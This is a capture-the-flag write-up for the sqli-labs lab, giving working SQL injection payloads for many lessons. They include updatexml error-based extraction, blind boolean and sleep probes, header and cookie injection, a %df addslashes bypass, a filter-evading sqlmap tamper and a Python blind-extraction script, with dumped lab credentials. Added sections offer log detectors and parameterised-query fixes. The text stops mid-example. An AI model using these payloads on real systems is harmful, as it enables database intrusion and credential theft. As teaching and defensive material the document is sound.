sqli-labs write up

sqli-labs

[TOC]

Less-1: error based string

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Determine how the string is quoted and closed

    ?id=' error
    ?id=" succeeds, nothing changes
    
  3. Use updatexml to extract the database, table and column names

    ?id=' and updatexml(0x01,concat(0x7e,database(),0x7e),0x01)%23
    
    ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),0x7e),0x01)%23
    
    ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),0x7e),0x01)%23
    
  4. Query the user passwords

    ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%200,1),0x7e),0x01)%23
    
  5. sqlmap approach

    sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --dbs -p id
    
    sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --current-db -p id
    
    sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security --tables -p id
    
    sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security -T users --dump -p id
    
    Table: users
    [13 entries]
    +----+------------+----------+
    | id | password   | username |
    +----+------------+----------+
    | 1  | Dumb       | Dumb     |
    | 2  | I-kill-you | Angelina |
    | 3  | p@ssword   | Dummy    |
    | 4  | crappy     | secure   |
    | 5  | stupidity  | stupid   |
    | 6  | genious    | superman |
    | 7  | mob!le     | batman   |
    | 8  | admin      | admin    |
    | 9  | admin1     | admin1   |
    | 10 | admin2     | admin2   |
    | 11 | admin3     | admin3   |
    | 12 | dumbo      | dhakkan  |
    | 14 | admin4     | admin4   |
    +----+------------+----------+
    
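The probes above (an unbalanced quote, updatexml/extractvalue with a concat marker, information_schema reads, a comment terminator) are exactly what a defender wants to recognise in web-server logs. The script below is an added example, not part of the write-up or of sqli-labs: it percent-decodes the query string of common-log-format access-log lines and flags the parameter values that match those shapes. The log lines are constructed for the example.

```python
# Added example (not part of the sqli-labs write-up): decode the query string of
# access-log lines and flag the error-based injection shapes used in the probes
# above. The log lines below are constructed for this example.
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 1543
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1-1 HTTP/1.1" 200 1543
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-1/?id=' HTTP/1.1" 200 1610
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-1/?id=%27%20and%20updatexml(0x01,concat(0x7e,database(),0x7e),0x01)%23 HTTP/1.1" 200 1620
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-1/?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),0x7e),0x01)%23 HTTP/1.1" 200 1640
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-1/?id=2 HTTP/1.1" 200 1550
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Each rule is applied to the decoded, lower-cased parameter value.
SIGNATURES = [
    ("error_based_xml_func", re.compile(r"\b(?:updatexml|extractvalue)\s*\(")),
    ("schema_read", re.compile(r"\binformation_schema\.(?:tables|columns|schemata)\b")),
    ("comment_terminator", re.compile(r"#|--\s|/\*")),
]


def classify(value: str) -> set:
    """Return the set of signature names matched by one decoded parameter value."""
    v = value.lower()
    hits = {name for name, rx in SIGNATURES if rx.search(v)}
    # An odd number of single quotes is the classic "break out of the string" probe.
    if v.count("'") % 2 == 1:
        hits.add("unbalanced_quote")
    return hits


def decoded_params(target: str):
    """Split the request target and percent-decode every query parameter."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_log(text: str):
    """Return one finding per log line whose parameters match any signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value in decoded_params(m.group("target")):
            hits = classify(value)
            if hits:
                findings.append({"ip": m.group("ip"), "param": key,
                                 "value": value, "hits": sorted(hits)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["param"], f["hits"], repr(f["value"])[:70])
```

Only the three probing requests from 10.0.0.5 are reported; the plain `id=1`, `id=1-1` and `id=2` lookups pass. In production the same decode-then-match step belongs in the WAF or SIEM rule, and the unbalanced-quote check is the one most worth keeping because it fires before any database function name appears.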

Less-2: error based integer

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, no result
    ?id=2-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1' error
    
  3. Extract the database as in Less-1

    ?id=1 and updatexml(0x01,concat(0x01,database(),0x01),0x01)
    

Less-3: error based string

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1' error; a ) shows up in the error message
    
  3. The injected statement must close the ); extraction as in Less-1

    ?id=1') and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
    

Less-4: error based string

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1" error; a ) shows up in the error message
    
  3. The injected statement must close the ); extraction as in Less-1

    ?id=1") and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
    

Less-5: double query

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1' error
    
  3. Extract the database as in Less-1

    ?id=1%27%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
    

Less-6: double query

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1" error
    
  3. Extract the database as in Less-1

    ?id=1%22%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
    

Less-7: Dump into outfile

Why dump into an outfile at all? The database runs as the mysql user and PHP runs as www-data, so a dumped file cannot be reached anyway.

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1' error
    ......
    ?id=1')) and 1=1 %23, the ')) closing is found
    
  3. Inject using the boolean technique

    ?id=1%27))%20and%20(select%20length(database()))%20=8%20%23
    
    ?id=1%27))%20and%20(select%20substr(database(),1,1))%20=%27s%27%20%23
    
    ?id=1%27))%20and%20(select%20length((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27)))%20=29%20%23
    
    ?id=1%27))%20and%20(select%20length((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%20%27users%27)))%20=20%20%23
    
    ?id=1%27))%20and%20(select%20length((select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%201)))%20=%2011%20%23
    
  4. The above is for reference only; use the sqlmap approach instead

    sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --dbs -p id --technique B
    
    sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --current-db -p id --technique B
    
    sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security --tables -p id --technique B
    
    sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security -T users --dump -p id --technique B
    
    Table: users
    [13 entries]
    +----+------------+----------+
    | id | password   | username |
    +----+------------+----------+
    | 1  | Dumb       | Dumb     |
    | 2  | I-kill-you | Angelina |
    | 3  | p@ssword   | Dummy    |
    | 4  | crappy     | secure   |
    | 5  | stupidity  | stupid   |
    | 6  | genious    | superman |
    | 7  | mob!le     | batman   |
    | 8  | admin      | admin    |
    | 9  | admin1     | admin1   |
    | 10 | admin2     | admin2   |
    | 11 | admin3     | admin3   |
    | 12 | dumbo      | dhakkan  |
    | 14 | admin4     | admin4   |
    +----+------------+----------+
    

Less-8: Blind bool

  1. Determine the type of the id parameter

    ?id=1 succeeds
    ?id=1-1 succeeds, with the same result as id=1
    
  2. Enter an unclosed quote

    ?id=1" normal response
    ?id=1' no response
    ?id=1' and 1=1 %23 normal response
    ?id=1' and 1=2 %23 no response
    
  3. Boolean injection as in Less-7

Less-9: Blind Time based

  1. Whatever junk is entered, the response never changes; after much trial and error, time-based injection with single-quote closing turned out to work

    ?id=1' and (select sleep(10)) %23
    
  2. Go straight to sqlmap

    sqlmap -u 'http://localhost:9090/Less-9/?id=1' --batch -D security -T users --dump  -p id --technique B
    
  3. In fact the HTML length differs between a matching row and no row, so boolean injection is possible on that basis

Less-10: Blind Time based

  1. Same as Less-9, with " as the closing quote; sqlmap needs --level 2
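Boolean-blind and time-based extraction (Less-7 to Less-10) leaves a very different trace from the error-based probes: one client sends long runs of near-identical requests that differ only in a guessed number or a single quoted character, or a request carrying sleep(). The script below is an added example, not part of the write-up or of sqli-labs: it groups decoded parameter values per client and path by their "shape" (digits and one-character string literals collapsed) and reports clients that cycle through many variants of one shape, plus any sleep()/benchmark() call. The log lines are constructed for the example.

```python
# Added example (not part of the write-up): detect the boolean-blind walk
# (length(...) = N, substr(...) = 'c') and time-based probes in access logs.
# Sample lines are constructed here; they are not real traffic.
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" \d{3} \d+'
)
TIME_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(")
PROBE_RE = re.compile(r"\b(?:length|substr|substring|ascii|mid)\s*\(.*[=<>]")


def _line(ip, target, sec):
    return f'{ip} - - [01/Jan/2024:11:00:{sec:02d} +0000] "GET {target} HTTP/1.1" 200 1543'


SAMPLE_LINES = []
for sec, guess in enumerate(range(5, 9)):        # length(database()) = 5..8, Less-7 style
    SAMPLE_LINES.append(_line(
        "10.0.0.7",
        f"/Less-7/?id=1%27))%20and%20(select%20length(database()))%20={guess}%20%23", sec))
for sec, ch in enumerate("qrs", start=4):         # substr(database(),1,1) = 'q', 'r', 's'
    SAMPLE_LINES.append(_line(
        "10.0.0.7",
        f"/Less-7/?id=1%27))%20and%20(select%20substr(database(),1,1))%20=%27{ch}%27%20%23", sec))
SAMPLE_LINES.append(_line("10.0.0.8", "/Less-9/?id=1%27%20and%20(select%20sleep(10))%20%23", 8))
SAMPLE_LINES.append(_line("10.0.0.9", "/Less-7/?id=2", 9))   # benign client
SAMPLE_LOG = "\n".join(SAMPLE_LINES)


def shape(value):
    """Collapse the parts a blind extractor iterates over: digits and one quoted char."""
    v = re.sub(r"'[^']'", "'?'", value.lower())
    return re.sub(r"\d+", "N", v)


def analyze(text, min_variants=3):
    """Return time-based hits and (ip, path, shape) groups with many probe variants."""
    time_based = []
    probes = defaultdict(set)   # (ip, path, shape) -> distinct raw values seen
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, parts = m.group("ip"), urlsplit(m.group("target"))
        for _, value in parse_qsl(parts.query, keep_blank_values=True):
            low = value.lower()
            if TIME_RE.search(low):
                time_based.append({"ip": ip, "path": parts.path, "value": value})
            if PROBE_RE.search(low):
                probes[(ip, parts.path, shape(value))].add(value)
    boolean_blind = [
        {"ip": ip, "path": path, "shape": s, "variants": len(vals)}
        for (ip, path, s), vals in probes.items() if len(vals) >= min_variants
    ]
    return {"time_based": time_based, "boolean_blind": boolean_blind}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for t in result["time_based"]:
        print("time-based:", t["ip"], t["path"], t["value"])
    for b in result["boolean_blind"]:
        print("boolean-blind:", b["ip"], b["path"], b["variants"], "variants of", b["shape"])
```

The threshold matters more than the regexes: a real extraction of even a short name needs dozens of variants of the same shape from one source, so a `min_variants` in the low tens still catches it while ignoring a single accidental quote. The response-size channel the Less-9 note mentions can be added by also keying on the status and size fields, which this example leaves out.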

Less-11: Error based String

  1. Username ' gives an error

  2. Username ' or 1=1 # logs in directly

  3. Error-based injection to extract the database

    uname=' and updatexml(1,concat(0x01,database(),0x01),1)#&passwd=&submit=Submit
    
  4. Go further with sqlmap

    4.1 Create the request file 11.post

    POST /Less-11/ HTTP/1.1
    Host: localhost:9090
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 78
    Origin: http://localhost:9090
    DNT: 1
    Connection: keep-alive
    Referer: http://localhost:9090/Less-11/
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    uname=&passwd=&submit=Submit
    

    4.2 sqlmap injection

    sqlmap -r 11.post --batch -D security -T users --dump -p uname --technique E
    

Less-12 Error based string

Same as the previous lesson, closing with ")

Less-13 Error based string

Same as the previous lesson, closing with ')

Less-14 Error based string

Same as the previous lesson, closing with "

Less-15 Blind Bool

  1. Username ' or 1=1 # logs in directly

  2. A sqlmap scan cannot exploit the boolean channel here but can exploit sleep

  3. Manual injection

    import string

    import requests


    def req(sql):
        # Send one boolean probe in the username field. The lab page shows
        # flag.jpg only when the injected condition evaluates to true.
        data = {
            "uname": "' or {}#".format(sql),
            "passwd": "",
            "submit": "Submit"
        }
        res = requests.post("http://localhost:9090/Less-15/", data=data)
        return "flag.jpg" in res.text


    def database():
        # Find the length first, then recover one character per position.
        sql = "(length(database()) = {})"
        length = 0
        for i in range(100):
            if req(sql.format(i)):
                length = i
                break
        sql = "(substr(database(),{},1) = '{}')"
        print(length)
        database_name = ""
        for i in range(length):
            for j in range(len(string.printable)):
                if req(sql.format(i + 1, string.printable[j])):
                    database_name += string.printable[j]
                    break
        print(database_name)


    def tables():
        # Same length-then-characters walk over the comma-joined table names.
        sql = "(length((select group_concat(table_name) from information_schema.tables where table_schema = 'security')) = {})"
        length = 0
        for i in range(100):
            if req(sql.format(i)):
                length = i
                break
        sql = "(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'security'),{},1) = '{}')"
        print(length)
        table_names = ""
        for i in range(length):
            for j in range(len(string.printable)):
                if req(sql.format(i + 1, string.printable[j])):
                    table_names += string.printable[j]
                    break
        print(table_names)


    def columns():
        # Same walk over the comma-joined column names of the users table.
        sql = "(length((select group_concat(column_name) from information_schema.columns where table_name = 'users')) = {})"
        length = 0
        for i in range(100):
            if req(sql.format(i)):
                length = i
                break
        sql = "(substr((select group_concat(column_name) from information_schema.columns where table_name = 'users'),{},1) = '{}')"
        print(length)
        column_names = ""
        for i in range(length):
            for j in range(len(string.printable)):
                if req(sql.format(i + 1, string.printable[j])):
                    column_names += string.printable[j]
                    break
        print(column_names)


    def dump():
        # Count the rows, then extract "id:username:password" one row at a time.
        sql = "((select count(*) from users) = {})"
        count = 0
        for i in range(100):
            if req(sql.format(i)):
                count = i
                break
        print(count)
        for c in range(count):
            length = 0
            sql = "(length((select concat(id,':',username,':',password) from users limit {},1)) = {})"
            for i in range(100):
                if req(sql.format(c, i)):
                    length = i
                    break
            sql = "(substr((select concat(id,':',username,':',password) from users limit {},1),{},1) = '{}')"
            line = ""
            for i in range(length):
                for j in range(len(string.printable)):
                    if req(sql.format(c, i + 1, string.printable[j])):
                        line += string.printable[j]
                        break
            print(line)


    def main():
        # database()
        # tables()
        # columns()
        dump()


    if __name__ == '__main__':
        main()
    

    The results are case-insensitive

Less-16 Blind Time based

  1. Username ") or 1=1 # logs in directly

  2. sqlmap injection

    sqlmap -r 16.post --batch -D security -T users --dump --dbms mysql -p uname 
    

Less-17: Update Query Error based

  • Pitfall: a valid username must be known first, and the SQL must raise an error, otherwise it is easy to overwrite every password in the database;
  1. Tried injecting the uname parameter with passwd left empty; no reaction to any strange SQL written into uname;

  2. Tried injecting the passwd parameter with uname left empty; no reaction to any strange SQL written into passwd;

  3. Keep passwd as '" and brute-force uname; with Dhakkan the error message is echoed;

  4. Keep uname as Dhakkan and inject passwd by hand; using sqlmap here would wreck the database;

  5. Extraction

    uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
    
    uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),0x7e),1)#&submit=Submit
    
    uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name= 'users'),0x7e),1)#&submit=Submit
    
    uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select concat(id,':',username,':',password) from users limit 1),0x7e),1)#&submit=Submit
    

Less-18: Header injection Error based

  • Pitfall: a user that can actually log in must be known
  1. Injecting uname and passwd has no effect;

  2. Injecting the X-Forwarded-For and X-Real-IP headers has no effect;

  3. Brute-forcing weak passwords finds that admin:admin logs in, and the User-Agent is echoed;

  4. Injecting '" into the User-Agent shows single-quote closing with two more columns after it;

  5. Extraction

    User-Agent: ',1,updatexml(1,concat(0x7e,database(),0x7e),1))#
    
  6. sqlmap injection

    sqlmap -r 18.post --batch -D security -T users --dump --technique E -p User-Agent
    

Less-19: Header injection Error based

Same as Less-17 above; the injection point is the Referer header

Less-20: Cookie injection Error based

Same as Less-17 above; the injection point is the Cookie

Less-21: Cookie injection base64

Same as Less-20 above; the injection point is the Cookie value, which is Base64-encoded

sqlmap needs the tamper base64encode.py

sqlmap -r 21.get --batch -D security -T users --dump  --technique E -p Cookie --tamper base64encode.py

Less-22: Cookie injection base64

Same as Less-21 above; the injection point is the Cookie, closing with a double quote

sqlmap needs the tamper base64encode.py

sqlmap -r 21.get --batch -D security -T users --dump  --technique E -p Cookie --tamper base64encode.py

Less-23: Error Based

  1. Try id values

    ?id=1 normal
    ?id=1-1 normal
    ?id=1' error
    ?id=1' %23 error
    ?id=1' --+ error
    ?id=1' and 1=1 and ''=' normal
    ?id=1' and 1=2 and ''=' no response
    
  2. Perform error-based injection in the middle condition; omitted

Less-24: Second Degree Injection

  1. Register a normal user abc:abc, log in, change the password, log out, and log in with the new password;
  2. The whole flow has three endpoints: register, log in, change password; verify each in turn;
  3. Register the user '":'" (username and password both a single quote followed by a double quote); registration succeeds;
  4. Log in as '":'"; login succeeds;
  5. Changing the password shows no success page, so it presumably failed; logging in with the new password fails, logging in with the original password succeeds;
  6. So the password change has an injection point;
  7. Change user abc's password to '" and log in again; login succeeds, proving the injection point is in the username;
  8. Register the user admin'#:123" and change its password to 123456
  9. Log in as admin with password 123456;
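The Less-17 pitfall (an UPDATE that can rewrite every password) and the Less-24 flow (a quote stored at registration and replayed, unescaped, from the session into the password-change UPDATE) are the same root cause: a value spliced into the statement. The code below is an added example, not the lab's PHP and not from the write-up: it models the password-change endpoint on an in-memory SQLite database so the second-order effect and its fix can be checked offline. SQLite ends a line comment with `--` where MySQL accepts `#`, so the stored username here is `admin'--` instead of the write-up's `admin'#`; passwords are stored in the clear only to keep the comparison visible, as the lab does.

```python
# Added example (not the lab's code): the Less-24 second-order flow and the
# Less-17 password-reset UPDATE on an in-memory SQLite database. SQLite uses
# "--" for line comments where MySQL accepts "#", hence the username admin'--.
import sqlite3


def fresh_db():
    """Constructed users table with a few rows in the spirit of security.users."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("Dumb", "Dumb"), ("admin", "admin"), ("Dhakkan", "dumbo")])
    return con


def register(con, username, password):
    """Registration stores the username exactly as typed (the lab escapes it on
    the way in, so the quote survives intact): this is the second-order seed."""
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))


def change_password_vulnerable(con, session_user, new_password):
    """Flawed pattern: the username comes from the session, is treated as trusted,
    and is spliced into the statement, so a stored quote and comment rewrite the WHERE."""
    sql = f"UPDATE users SET password='{new_password}' WHERE username='{session_user}'"
    return con.execute(sql).rowcount


def change_password_safe(con, session_user, new_password):
    """Hardened form: every value is bound, whatever it contains and wherever it came from."""
    return con.execute("UPDATE users SET password=? WHERE username=?",
                       (new_password, session_user)).rowcount


def password_of(con, username):
    row = con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = fresh_db()
    register(con, "admin'--", "123")
    change_password_vulnerable(con, "admin'--", "123456")
    print("vulnerable: admin password is now", password_of(con, "admin"))   # 123456

    con = fresh_db()
    register(con, "admin'--", "123")
    change_password_safe(con, "admin'--", "123456")
    print("safe: admin password still", password_of(con, "admin"))         # admin
```

With the bound parameters the stored `admin'--` matches only its own row, and a new password containing quotes (the Less-17 passwd field) is plain data rather than part of the statement. Escaping on input, as the lab's registration does, is not a substitute: the value is stored unescaped and every later statement that uses it must be parameterised on its own.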

Less-25 Trick with OR & AND

  1. Determine the type of the id parameter

    ?id=1 normal
    ?id=1'" error
    
  2. Try error-based injection

    ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23
    

    and turns out to be deleted; double-write and and try again

    ?id=1' anandd updatexml(1,concat(0x7e,database(),0x7e),1)%23
    

    The database name is extracted

  3. Write a simple sqlmap tamper that doubles keywords to get past the single-pass filter

    #!/usr/bin/env python
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.LOW
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        """ 
        Replaces and to anandd , or to oorr
        """
        payload = payload.replace("and","anandd")
        payload = payload.replace("AND","ANANDD")
        payload = payload.replace("or","oorr")
        payload = payload.replace("OR","OORR")
    
        return payload
    
    sqlmap -u "http://localhost:9090/Less-25/?id=1" --batch --dbms mysql --technique E -p id --tamper doubleword.py -D security -T users --dump
    
    Table: users
    [13 entries]
    +----+------------+----------+
    | id | password   | username |
    +----+------------+----------+
    | 1  | Dumb       | Dumb     |
    | 2  | I-kill-you | Angelina |
    | 3  | p@ssword   | Dummy    |
    | 4  | crappy     | secure   |
    | 5  | stupidity  | stupid   |
    | 6  | genious    | superman |
    | 7  | mob!le     | batman   |
    | 8  | admin      | admin    |
    | 9  | admin1     | admin1   |
    | 10 | admin2     | admin2   |
    | 11 | admin3     | admin3   |
    | 12 | dumbo      | dhakkan  |
    | 14 | admin4     | admin4   |
    +----+------------+----------+
    
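The Less-25 filter fails because it deletes each keyword once, so a doubled keyword reassembles itself after the pass; it also mangles legitimate values that happen to contain `or` or `and`. The functions below are an added example, not from the write-up or from sqli-labs: they reproduce the single-pass filter, show the fixpoint variant that at least cannot be undone by doubling, and the allowlist check for a numeric id, which is the fix that actually holds.

```python
# Added example (not from the write-up): why a single-pass keyword filter fails,
# what repeating it to a fixpoint changes, and the allowlist validation that a
# numeric id parameter should get instead. Inputs below are constructed.
import re

KEYWORDS = re.compile(r"(?i)or|and")


def strip_once(value):
    """The Less-25 style filter: delete every occurrence of or/and in one pass."""
    return KEYWORDS.sub("", value)


def strip_to_fixpoint(value, limit=20):
    """Repeat the deletion until nothing changes, so a doubled keyword cannot
    reassemble itself. Still a blacklist: it breaks data and proves nothing."""
    for _ in range(limit):
        stripped = KEYWORDS.sub("", value)
        if stripped == value:
            return stripped
        value = stripped
    raise ValueError("filter did not converge")


def validate_id(value):
    """Allowlist validation for an integer id: accept only a short run of digits
    and hand the database an int, never the raw string."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError(f"invalid id: {value!r}")
    return int(value)


if __name__ == "__main__":
    print(strip_once("anandd"))          # and   (doubled keyword survives one pass)
    print(strip_to_fixpoint("anandd"))   #       (empty: fixpoint removes it)
    print(strip_once("Andrew"))          # rew   (legitimate data is damaged)
    print(validate_id("1"))              # 1
```

The collateral damage on `Andrew` and `password` is the practical argument against this class of filter: a rule strong enough to stop every spelling of a keyword is also strong enough to corrupt ordinary input, while validating the type of the parameter and binding it costs nothing.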

Less-26: Trick with comment

  1. Determine the injection type

    ?id=1'" single-quote closing
    ?id=1' or 1=1 # spaces and comments are all filtered
    ?id=1'||1=1||''=' succeeds
    
  2. Extract the database, tables and columns

    http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,database(),0x7e),1)||%27%27=%27
    
    http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`=%27security%27),0x7e),1)||%27%27=%27
    
    http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_name`=%27users%27),0x7e),1)||%27%27=%27
    
    http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(concat(id,':',username,':',passwoorrd))from(users)where`id`=%271%27),0x7e),1)||%27%27=%27
    

Less-26a: Trick with comment

  1. Test the injection type

    ?id=1 succeeds
    ?id='" fails
    ?id='||''=' 
    ?id='||'1'=' fails
    ?id='||1=1||'1'=' succeeds
    ?id='||1=2||'1'=' fails, blind bool
    
  2. Try extraction

    http://localhost:9090/Less-26a/?id=%27||(select(length(database())))=8||%271%27=%27
    
    http://localhost:9090/Less-26a/?id=%27||(select(substr(database(),1,1)))='s'||%271%27=%27
    
    omitted
    

Less-27: Trick with select & union

Same as Less-26; select is filtered, use SeLect instead

Less-27a: Trick with select & union

Same as the two lessons above; double-quote closing, SeLect, blind bool

http://localhost:9090/Less-27a/?id=%22||(SeLect(length(database())))=8||%221%22=%22

Less-28: Trick with select & union

Same as the previous lesson, single-quote closing

Less-28a: Trick with select & union

Same as Less-27a above

Less-29: Protection with WAF

The WAF does not seem to do anything; basic error based

Less-30: Protection with WAF

The WAF does not seem to do anything; basic blind bool

Less-31: Protection with WAF

Same as Less-29 above

Less-32: Bypass addslashes

%df swallows the backslash

?id=%df' or 1=1 %23 succeeds

?id=%df' or updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=%df' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=unhex(7365637572697479)),0x7e),1)%23

?id=%df' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=unhex(7573657273)),0x7e),1)%23

?id=%df' or updatexml(1,concat(0x7e,(select concat(id,0x3a,username,0x3a,password) from users limit 0,1),0x7e),1)%23
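Why `%df` "swallows" the backslash: addslashes() works on bytes and inserts 0x5C before the quote, but the connection decodes the statement as GBK, where 0xDF 0x5C is one valid two-byte character, so the backslash is absorbed and the quote survives. The functions below are an added example, not from the write-up or from sqli-labs: they model the byte-level escape and the GBK decode so the failure can be checked offline, beside the escape-after-decode form that cannot be fooled this way.

```python
# Added example (not from the write-up): model PHP addslashes() on bytes, the
# GBK decode the MySQL connection performs, and the decode-then-escape fix.
# The payload bytes and sample text are constructed for this example.

def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-level escaping in the style of addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_gbk_server_sees(escaped: bytes) -> str:
    """What a connection whose charset is GBK makes of the escaped bytes."""
    return escaped.decode("gbk", errors="replace")


def escape_after_decoding(raw: bytes, charset: str = "gbk"):
    """Decode with the real connection charset first, reject bytes that are not
    valid in it, then escape the text: an inserted backslash can no longer fuse
    with a dangling lead byte because the lead byte never reached the statement."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'")


if __name__ == "__main__":
    payload = b"\xdf'"                       # the %df' from the probes above
    escaped = addslashes_bytes(payload)      # b"\xdf\\'"
    print(escaped, "->", repr(as_gbk_server_sees(escaped)))   # backslash gone, quote intact
    print(escape_after_decoding(payload))                      # None: rejected
    print(escape_after_decoding("運's".encode("gbk")))         # 運\'s: quote escaped
```

The real remedies are the ones this example stands in for: declare the connection charset to the driver (mysqli_set_charset rather than a bare SET NAMES, or utf8mb4 end to end) so the escaping function and the server agree on byte boundaries, and bind values with prepared statements so the question of escaping does not arise. addslashes() is not a SQL escaping function under any charset.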

Less-34 Bypass ADD SLASHES

POST version of Less-32

Less-35 Bypass Add SLASHES

Simplified version of Less-32; no quote needed

Less-36 Bypass MySQL real escape

Same as Less-32

Less-37 Bypass MySQL real escape

Same as Less-34

Less-38 stacked Query

Basic error based

Less-39 stacked Query

Basic error based

Less-40 stacked Query

Basic blind bool

Less-41 stacked Query

Basic blind bool

Less-42 stacked Query error based

Injection in the password field, single-quote closing, error based

Less-43 stacked Query error based

Injection in the password field, single quote plus parenthesis closing, error based

Less-44 stacked Query blind

Injection in the password field, single quote plus parenthesis closing; boolean injection based on whether the response HTTP code is 302

login_user=&login_password=' or length(database()) =8#&mysubmit=Login

Less-45 stacked Query blind

Same as Less-44 above, single quote plus parenthesis closing

Less-46 ORDER BY

?sort=1 || updatexml(1,concat(0x7e,database(),0x7e),1)
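A sort column cannot be passed as a bind parameter, which is why ORDER BY endpoints (Less-46 to Less-53) keep turning up injectable. The code below is an added example, not from the write-up or from sqli-labs: it maps the request's sort value onto an allowlist of real column names and directions and rejects anything else, then applies the resulting clause on a small in-memory SQLite table constructed for the example.

```python
# Added example (not from the write-up): ORDER BY cannot be parameterised, so
# the column and direction are chosen from an allowlist and never interpolated
# from the request. The users table is constructed for this example.
import sqlite3

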